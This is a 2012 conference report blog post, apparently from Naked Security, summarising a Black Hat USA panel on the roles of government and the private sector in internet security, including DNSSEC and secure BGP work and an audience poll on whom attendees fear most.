  25. Black Hat – Smashing the future for fun and profit | Naked Security by Chester Wisniewski on July 25, 2012 I'm delighted to once again be writing to you from the Black Hat USA conference in Las Vegas, Nevada. This year's Black Hat is as big as ever and the talks seem to have improved over 2011. The first session I sat in today was titled "Smashing the future for fun and profit" and was a panel with Jeff Moss (Dark Tangent), Adam Shostack, Marcus Ranum and Bruce Schneier moderated by Jennifer Granick. Those of you that may have asked me to be on a panel in the past may well know that I am not a big fan of panels. Most of them are buckets of #FAIL. This one however was very well executed. It was a great mix of hands-on practitioner mixed with big think topics. Surprisingly nearly the entire discussion revolved around the role, responsibilities and behavior of government. Maybe Jeff is to blame for that considering his roles at Homeland Security and ICANN. I think generally everyone seemed to agree with Marcus Ranum on the dividing line between what the government should be doing versus the private sector. Just like in other parts of our society the line is drawn between what only a nation-state can do and what the private sector is incented to do. Jeff pointed out that government also plays an important role in those things that the private sector simply isn't interested in, even if the development of these new technologies is needed and important. He gave examples of how DHS has been involved in further development work on DNSSEC and secure BGP. Both are very important for the future integrity and security of the internet, yet there was little commercial advantage for the private sector to invest. Jennifer did a brief poll asking the audience if they were more afraid of the government having access to their information and doing undesirable things with it or if we were more afraid of Google. A significantly larger proportion are afraid of Google.
Phrased another way we were asked if we are most afraid of the government, corporations or "the bad guys". When put in these terms the "bad guys" were the most feared without question. I found the panel's opinions both enlightening and realistic. It was a no-bullshit zone and that openness led to the success of the session. The conclusion sums it up well. We still have a long way to go and we will not ever likely get there, but ten years from now we are likely to be better off for having tried to make it better. Source: Black Hat – Smashing the future for fun and profit | Naked Security